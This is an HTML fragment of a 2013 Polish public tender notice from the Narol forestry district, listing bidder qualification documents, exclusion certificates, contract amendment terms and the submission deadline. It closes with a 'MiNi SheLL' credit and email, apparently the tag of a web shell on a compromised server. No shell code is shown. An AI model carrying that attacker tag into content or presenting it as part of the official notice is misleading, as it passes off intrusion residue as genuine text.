dla Części I - 50 000,00 zł. 
dla Części II - 50 000,00 zł.
dla Części III - 10 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający wymaga zawarcia umowy wg projektu załączonego do specyfikacji istotnych warunków zamówienia. Projekt umowy stanowi załącznik nr 6 do SIWZ.
Na podstawie art.144 ust. 1 ustawy Pzp, Zamawiający dopuszcza możliwość wprowadzenia istotnych zmian zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, jeżeli wystąpi, co najmniej jedna z wymienionych niżej okoliczności oraz zostaną uwzględnione, opisane poniżej warunki wprowadzenia tych zmian.Zmiana terminu wykonania zamówienia może nastąpić- w przypadku przedłużenia procedury udzielenia przedmiotowego zamówienia publicznego i-lub zamówienia na wybór Wykonawcy robót budowlanych poprzez środki ochrony prawnej, wykorzystywane przez Wykonawców lub inne podmioty, a termin zakończenia przedmiotu umowy określony został datą,
-na skutek działania siły wyższej -np. klęski żywiołowej, strajku generalnego lub lokalnego, mającego bezpośredni wpływ na terminowość wykonywania nadzorowanych robót,-w przypadku wystąpienia warunków atmosferycznych, uniemożliwiających wykonywanie nadzorowanych robót budowlanych,
-jeżeli wystąpią okoliczności, których strony nie mogły przewidzieć, pomimo zachowania należytej staranności,-jeżeli konieczność zmiany terminu zakończenia nadzorowanych robót wystąpi w następstwie okoliczności leżących po stronie Zamawiającego, w szczególności w przypadku czasowego wstrzymania robót przez Zamawiającego,-w przypadku wystąpienia którejkolwiek z wymienionych wyżej okoliczności, termin realizacji zamówienia może ulec odpowiedniemu wydłużeniu o czas niezbędny na należyte spełnienie świadczenia, nie dłużej jednak niż czas trwania tych okoliczności, gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego,-w przypadku zmiany terminu zakończenia nadzorowanych robót budowlanych realizowanych przez wykonawcę robót budowlanych lub wydłużenia się terminów przewidzianych dla czynności odbiorowych dotyczących odbioru robót budowlanych,-konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie nadzorowanych robót budowlanych,-realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań.Pozostałe zmiany-1.możliwość powierzenia wykonania części zakresu umowy innemu podwykonawcy niż ten, który został wskazany w ofercie Wykonawcy lub możliwość zmiany zakresu wykonania zamówienia przez podwykonawcę -dotyczy Wykonawców, którzy składając ofertę wskazali na udział podwykonawców w realizacji zamówienia Propozycję ww. zmiany Wykonawca jest zobowiązany przedstawić Zamawiającemu na piśmie na 10 dni przed planowana zmianą. Zmiana będzie możliwa tylko i wyłącznie po uzyskaniu uprzedniej zgody Zamawiającego.2.zmiana którejkolwiek ze wskazanych w Wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia osób przewidzianych do realizacji zamówienia, w trakcie wykonywania Umowy, musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana przez Zamawiającego. Zamawiający zaakceptuje taką zmianę wyłącznie wtedy, gdy kwalifikacje proponowanych osób będą takie same lub wyższe od kwalifikacji wymaganych przez Zamawiającego.a)wykonawca powinien przedłożyć Zamawiającemu propozycję zmiany, o której mowa w pkt. 2, nie później niż 10 dni roboczych przed planowanym dopuszczeniem do udziału w wykonaniu Umowy danej osoby.
b)jakiekolwiek zawieszenie wykonywania Umowy wynikające z braku odpowiedniej osoby będzie traktowane, jako wynikłe z przyczyn leżących po stronie Wykonawcy i nie może stanowić podstawy do zmiany terminu zakończenia wykonania Umowy.
c)skierowanie, bez uzyskania uprzedniej pisemnej akceptacji Zamawiającego, do wykonania Umowy innych osób niż wskazane w ww. Wykazie, może stanowić podstawę odstąpienia od Umowy przez Zamawiającego z przyczyn zależnych od Wykonawcy. 3.możliwość zmiany stawki podatku od towarów i usług VAT oraz zmiany wartości brutto umowy. Ceny w przypadku zmiany stawki podatku od towarów i usług VAT; ceny netto określone w ofercie i umowie pozostają niezmienne przez cały okres obowiązywania umowy. Jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług VAT, od chwili zmiany podatek w nowej stawce będzie doliczany do dotychczasowych cen netto, bez konieczności zmiany umowy.4.konieczność zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy, na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu; umowa może zostać zmieniona w zakresie dostosowania do zmienionej umowy lub wytycznych.5.zmiany umowy wynikające z działania siły wyższej, zmiany na skutek zaistnienia okoliczności niemożliwych do przewidzenia w momencie zawierania umowy i takie na które strony nie mają wpływu -np. zmiany wynikające ze zmiany prawa, zmian w przepisach oraz wytycznych do realizacji obiektów małej retencji w Nadleśnictwach w tym zmian w założeniach projektowych tzw. Dobrych praktykach w realizacji obiektów małej retencji  w górach -o zmianie wytycznych Zamawiający powiadomi Wykonawcę w okresie wykonywania przedmiotu umowy, Wykonawca zobowiązuje się do wykonania przedmiotu umowy zgodnie z wprowadzonymi zmianami. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych w szczególności:a)zmiana danych związanych z obsługą administracyjnoorganizacyjną Umowy (np. zmiana nr rachunku bankowego,b)zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami.Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę lub nie bez podawania uzasadnienia odmowy. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno przez Zamawiającego jak i przez Wykonawcę.
Zmiany umowy są skuteczne, jeżeli zostaną wprowadzone z zachowaniem formy pisemnej i są akceptowane przez strony umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_narol/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Narol ul.Bohaterów Września 1939 r. nr 38 37-610 Narol..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2013 godzina 10:00, miejsce: Nadleśnictwo Narol ul.Bohaterów Września 1939 r. nr 38 37-610 Narol pokój nr 8 Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com